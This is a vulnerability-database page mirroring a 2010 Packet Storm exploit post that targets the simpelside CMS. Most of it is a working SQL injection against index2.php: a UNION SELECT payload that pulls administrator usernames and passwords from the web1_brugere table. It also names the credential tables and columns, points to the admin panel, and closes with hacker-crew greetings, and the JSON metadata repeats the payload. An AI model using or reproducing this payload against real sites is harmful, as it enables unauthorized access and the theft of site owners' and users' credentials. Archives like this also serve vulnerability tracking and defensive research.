Search...

Simpleside SQL Injection

2010-05-26T00:00:00

ID PACKETSTORM:89940
Type packetstorm
Reporter MN9
Modified 2010-05-26T00:00:00

Description

                                        
                                            `  
  
  
#Tital : simpelside (index2.php) SQL Injection Vulnerability#EDB-ID: # CVE-ID: ()# OSVDB-ID: ()# Author: MN9# Published: 2010-05-25# Verified: yes  
  
  
  
##########################################################&gt;..&gt; Author : MN9  
&gt;..&gt; Email : Mn9(at)Live.No &gt;..&gt; Script Home : www.simpelside.dk  
&gt;..&gt; Doork : :)##########################################################  
~## Exploit ##~   
http://site/index2.php?id=2 [ SQL Injection ] &mainid=2  
  
~## Example ##~ http://site/index2.php?id=2 and 1=0 union select 1,2,concat(brugernavn,0x3a,adgangskode),4,5,6 from web1_brugere--&mainid=2  
  
##########################################################  
# All Tables admin ::   
web1_brugereweb2_brugereweb3_brugereweb4_brugere  
# column user : brugernavn# column pass : adgangskode##########################################################  
# admin panel :  
http://site/admin/  
##########################################################  
# Greetz to :  
RoMaNcYxHaCkEr ~ Mr.SaFa7 ~ Sniper code ~ All Al-Mslm3n  
  
[ v4-team.com ] && [ 7rs.org ]  
  
  
  
  
  
_________________________________________________________________  
Hotmail: خدمة بريد إلكتروني مجانية وموثوق بها وغنية.  
https://signup.live.com/signup.aspx?id=60969  
  
`

JSON Vulners Source

Initial Source

{"id": "PACKETSTORM:89940", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Simpleside SQL Injection", "description": "", "published": "2010-05-26T00:00:00", "modified": "2010-05-26T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/89940/Simpleside-SQL-Injection.html", "reporter": "MN9", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:16:45", "viewCount": 1, "enchantments": {"score": {"value": 0.2, "vector": "NONE", "modified": "2016-11-03T10:16:45", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:16:45", "rev": 2}, "vulnersScore": 0.2}, "sourceHref": "https://packetstormsecurity.com/files/download/89940/simpleside-sql.txt", "sourceData": "` \n \n \n#Tital : simpelside (index2.php) SQL Injection Vulnerability#EDB-ID: # CVE-ID: ()# OSVDB-ID: ()# Author: MN9# Published: 2010-05-25# Verified: yes \n \n \n \n##########################################################>..> Author : MN9 \n>..> Email : Mn9(at)Live.No >..> Script Home : www.simpelside.dk \n>..> Doork : :)########################################################## \n~## Exploit ##~ \nhttp://site/index2.php?id=2 [ SQL Injection ] &mainid=2 \n \n~## Example ##~ http://site/index2.php?id=2 and 1=0 union select 1,2,concat(brugernavn,0x3a,adgangskode),4,5,6 from web1_brugere--&mainid=2 \n \n########################################################## \n# All Tables admin :: \nweb1_brugereweb2_brugereweb3_brugereweb4_brugere \n# column user : brugernavn# column pass : adgangskode########################################################## \n# admin panel : \nhttp://site/admin/ \n########################################################## \n# Greetz to : \nRoMaNcYxHaCkEr ~ Mr.SaFa7 ~ Sniper code ~ All Al-Mslm3n \n \n[ v4-team.com ] && [ 7rs.org ] \n \n \n \n \n \n_________________________________________________________________ \nHotmail: \u062e\u062f\u0645\u0629 \u0628\u0631\u064a\u062f \u0625\u0644\u0643\u062a\u0631\u0648\u0646\u064a \u0645\u062c\u0627\u0646\u064a\u0629 \u0648\u0645\u0648\u062b\u0648\u0642 \u0628\u0647\u0627 \u0648\u063a\u0646\u064a\u0629. \nhttps://signup.live.com/signup.aspx?id=60969 \n \n`\n"}